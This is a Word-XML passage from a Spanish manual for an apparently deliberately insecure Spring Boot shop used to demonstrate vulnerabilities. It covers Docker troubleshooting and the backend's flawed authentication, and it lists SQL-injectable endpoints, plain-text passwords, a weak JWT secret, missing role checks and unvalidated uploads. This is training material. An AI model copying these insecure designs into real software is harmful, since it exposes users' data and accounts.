        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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3458"/>
        <w:gridCol w:w="3628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="3E6BFEEE" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2154" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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1CEDE2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Problema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3458" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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DED7EA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Diagnóstico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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0DD332" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Acción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="7C180E38" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/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1FBB2A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PORTS vacío</w:t>
            </w:r>
          </w:p>
        </w:tc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5C17C4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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> no devuelve asignaciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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08AE6B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Aplicar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Anexo B, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ejecutar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> down y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>up --force-recreate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="6048C167" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2154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E661E5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Puerto ocupado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3458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46693B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Docker informa port is already allocated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628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3FCA83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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Detener el servicio conflictivo o cambiar el puerto </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>en .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="12ADB3A7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/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308700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Backend no healthy</w:t>
            </w:r>
          </w:p>
        </w:tc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B7EB21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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Fallo de conexión a PostgreSQL o compilación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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C452E9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Revisar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> docker compose logs backend y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>postgres.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="3CC71D28" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2154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1BCA6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Datos antiguos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3458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3F01E0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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>El volumen conserva un esquema previo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3628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37B27C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Ejecutar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> docker compose --profile full down -v y reconstruir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2992E90E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/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B666C4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Build Maven lento</w:t>
            </w:r>
          </w:p>
        </w:tc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9141E0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Primera descarga de dependencias.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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98EB97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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Esperar y conservar la caché; comprobar conectividad a Maven </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Central.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="040398D4" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="49F0C5A5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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AAF38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># Detener sin borrar datos</w:t>
            </w:r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br/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>docker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 xml:space="preserve"> </w:t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>compose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 xml:space="preserve"> --</w:t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>profile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 xml:space="preserve"> full </w:t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>down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br/>
            </w:r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br/>
              <w:t># Reinicio limpio de base de datos</w:t>
            </w:r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br/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>docker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 xml:space="preserve"> </w:t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>compose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 xml:space="preserve"> --</w:t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>profile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 xml:space="preserve"> full </w:t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>down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 xml:space="preserve"> -v</w:t>
            </w:r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br/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>docker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 xml:space="preserve"> </w:t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>compose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 xml:space="preserve"> --</w:t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>profile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 xml:space="preserve"> full up -d --</w:t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>build</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34DB1DAA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550DCA9D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22CA4C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. Descripción técnica del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AB7703F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una API </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">REST Spring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Boot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> organizada en controladores, servicios, repositorios, entidades, DTO, configuración, manejo de errores y utilidades. La aplicación no usa Spring Security en la V1; la autenticación y autorización se implementan manualmente, lo que permite </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>demostrar fallas de control de acceso y autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59E1ED" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Estructura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>paquetes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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="3250D11B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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D0E0D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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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>com.tienda</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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>.insegura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br/>
              <w:t xml:space="preserve">|-- </w:t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>controller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 xml:space="preserve">/   </w:t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>Endpoints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 xml:space="preserve"> REST</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">|-- </w:t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>service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>/      Lógica de negocio y ejecución de comandos</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">|-- </w:t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>repository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 xml:space="preserve">/   JPA y </w:t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>JdbcTemplate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 xml:space="preserve"> vulnerable</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">|-- </w:t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>model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 xml:space="preserve">/   </w:t>
            </w:r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 xml:space="preserve">     </w:t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>User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 xml:space="preserve">, </w:t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>Product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 xml:space="preserve">, </w:t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>Category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 xml:space="preserve">, </w:t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>Order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 xml:space="preserve"> y </w:t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>OrderItem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br/>
              <w:t xml:space="preserve">|-- </w:t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>dto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 xml:space="preserve">/          </w:t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>LoginRequest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 xml:space="preserve">, </w:t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>RegistroRequest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 xml:space="preserve"> y </w:t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>ApiResponse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br/>
              <w:t xml:space="preserve">|-- </w:t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>config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 xml:space="preserve">/       CORS, </w:t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>Actuator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 xml:space="preserve"> y configuración de arranque</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">|-- </w:t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>exception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 xml:space="preserve">/    </w:t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>GlobalExceptionHandler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br/>
              <w:t xml:space="preserve">`-- </w:t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>util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 xml:space="preserve">/         </w:t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7"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>LegacyLogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6172BE1E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F45F6A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Flujo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>autenticación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD292A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>El cliente envía username y password a POST /api/auth/login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51213149" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>AuthService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> compara el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C8F45" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>La aplicación genera un JWT con secreto débil y duración excesiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC10410" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Los controladores interpretan el token de forma manua</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>l.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C5A3EB" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>endpoints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrativos comprueban autenticación, pero omiten validar el rol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602E45F6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Endpoints </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>principales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3798"/>
        <w:gridCol w:w="4309"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="3011BFB7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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3ED52B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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84B48E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Ruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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0F6E93" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Función / riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="41F6D073" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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F49FCE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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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A370E3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/api/productos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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2E8024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Lista el catálogo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2EC7E61A" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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A7B0DB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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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389CAC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/api/productos/buscar?q=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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DF4787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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Búsqueda vulnerable a SQL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="7FFBD7D4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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D3480A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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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7F843E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/api/productos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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012BD9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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Detalle vulnerable a inyección en el identificador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="069F0C9E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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93E276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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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63D235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/api/productos/{id}/imagen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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843982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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Carga de archivo sin validación suficiente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="4934F846" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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3BB74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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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2B1180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/api/auth/registro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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4B5CD4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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Registro que acepta el rol enviado por el cliente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="210FA4FB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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25654E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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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AC2CF1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/api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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44D798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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> sin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>rate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
